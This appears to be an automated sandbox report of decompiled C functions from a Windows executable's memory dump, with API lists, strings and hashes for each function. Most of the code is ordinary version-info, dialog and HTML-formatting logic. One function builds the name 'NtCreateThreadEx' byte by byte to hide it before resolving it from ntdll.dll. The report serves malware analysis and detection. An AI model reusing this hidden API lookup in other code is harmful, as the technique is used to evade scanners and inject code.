Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

0x0040b04d
0x0040b05e
0x0040b060
0x0040b063
0x0040b06a
0x0040b06d
0x0040b076
0x0040b07b
0x0040b07e
0x0040b084
0x0040b08e
0x0040b0a8
0x0040b0aa
0x0040b0ad
0x0040b0b0
0x0040b0b3
0x0040b0b6
0x0040b0b8
0x0040b0bb
0x0040b0be
0x0040b0c1
0x0040b0c4
0x0040b0c7
0x0040b0ca
0x0040b0cd
0x0040b0cd
0x0040b0e5
0x0040b11f
0x0040b128
0x0040b0e7
0x0040b0e7
0x0040b0f1
0x0040b0f2
0x0040b0f3
0x0040b0fb
0x0040b0fd
0x0040b0fe
0x0040b11d
0x00000000
0x00000000
0x0040b11d
0x0040b13c
0x0040b151
0x0040b166
0x0040b17b
0x0040b190
0x0040b1a5
0x0040b1ba
0x0040b1cf
0x0040b1d6
0x0040b1d7
0x0040b1d8
0x0040b1de
0x0040b1e3

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

ProductVersion, xrefs: 0040B16B
\VarFileInfo\Translation, xrefs: 0040B0D8
OriginalFileName, xrefs: 0040B1BF
ProductName, xrefs: 0040B12F
FileDescription, xrefs: 0040B141
LegalCopyright, xrefs: 0040B1AA
InternalName, xrefs: 0040B195
FileVersion, xrefs: 0040B156
%4.4X%4.4X, xrefs: 0040B0F3
CompanyName, xrefs: 0040B180
040904E4, xrefs: 0040B122

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

0x0040a1f8
0x0040a26d
0x00000000
0x0040a26f
0x0040a205
0x0040a20b
0x0040a20d
0x0040a213
0x0040a214
0x0040a215
0x0040a216
0x0040a217
0x0040a219
0x0040a21f
0x0040a223
0x0040a227
0x0040a22b
0x0040a22f
0x0040a233
0x0040a237
0x0040a23b
0x0040a23f
0x0040a243
0x0040a247
0x0040a24b
0x0040a24f
0x0040a253
0x0040a257
0x0040a25b
0x0040a25f
0x0040a269
0x00000000
0x0040a26c
0x0040a271

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

C, xrefs: 0040A237
a, xrefs: 0040A22B
t, xrefs: 0040A223
e, xrefs: 0040A24F
e, xrefs: 0040A227
h, xrefs: 0040A25B
E, xrefs: 0040A247
T, xrefs: 0040A257
e, xrefs: 0040A233
d, xrefs: 0040A23F
x, xrefs: 0040A24B
ntdll.dll, xrefs: 0040A1FA
t, xrefs: 0040A22F
a, xrefs: 0040A253
r, xrefs: 0040A23B
N, xrefs: 0040A21F
r, xrefs: 0040A243

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

0x00407f9b
0x00407fa3
0x00407fad
0x00407fb9
0x0040802e
0x00408032
0x00408038
0x0040803e
0x00407fbb
0x00407fc9
0x00407fd0
0x00407fe0
0x00407fe5
0x00407ff7
0x00408015
0x0040801b
0x00408021
0x00408021
0x00408051
0x00408051
0x00408059
0x00408065
0x00408069
0x0040806f
0x00408087
0x00408087
0x0040809c
0x004080bb
0x004080d1
0x004080de
0x004080e2
0x004080ea
0x004080fb
0x00408105
0x00408115
0x00408121
0x00408127
0x00408150

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040ae90
0x0040aeab
0x0040aeb2
0x0040aec0
0x0040aec7
0x0040aecc
0x0040aed3
0x0040aeda
0x0040aee1
0x0040aee1
0x0040aee7
0x0040aeea
0x0040aeed
0x0040aef9
0x0040aefe
0x0040af05
0x0040af07
0x0040af08
0x0040af13
0x0040af18
0x0040af19
0x0040af26
0x0040af2b
0x0040af2b
0x0040af2e
0x0040af34
0x0040af43
0x0040af44
0x0040af4f
0x0040af54
0x0040af55
0x0040af62
0x0040af67
0x0040af70
0x0040af76
0x0040af7a
0x0040af82
0x0040af88
0x0040af8d
0x0040af97
0x0040af9f
0x0040afa5
0x0040afa9
0x0040afb1
0x0040afb7
0x0040afbd

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

color="#%s", xrefs: 0040AF44
<b>, xrefs: 0040AF7C
<font, xrefs: 0040AEF3
</font>, xrefs: 0040AFAB
</b>, xrefs: 0040AF99
size="%d", xrefs: 0040AF08

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

0x00403c09
0x00403c0c
0x00403c11
0x00403c1b
0x00403c3f
0x00403c4a
0x00403c6e
0x00403c96
0x00403c9a
0x00403ca6
0x00403cb3
0x00403cb8
0x00403cc5
0x00403cca
0x00403cdd
0x00403ce6
0x00403cf8
0x00403d11
0x00403d26
0x00403d3f
0x00403d54
0x00403d6d
0x00403d76
0x00403d88
0x00403d9e
0x00403db0
0x00403db5
0x00403dc4
0x00403dc8
0x00403dc9
0x00403dca
0x00403dda
0x00403ddf
0x00403de2
0x00403de3
0x00403df4
0x00403df8
0x00403df9
0x00403dfa
0x00403e0a
0x00403e0f
0x00403e12
0x00403e13
0x00403e22
0x00403e26
0x00403e28
0x00403e29
0x00403e39
0x00403e3e
0x00403e41
0x00403e42
0x00403e51
0x00403e55
0x00403e57
0x00403e58
0x00403e68
0x00403e6d
0x00403e70
0x00403e71
0x00403e71
0x00403e87
0x00403e8d
0x00403e9e
0x00403ea6
0x00403eaf
0x00403ebc

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
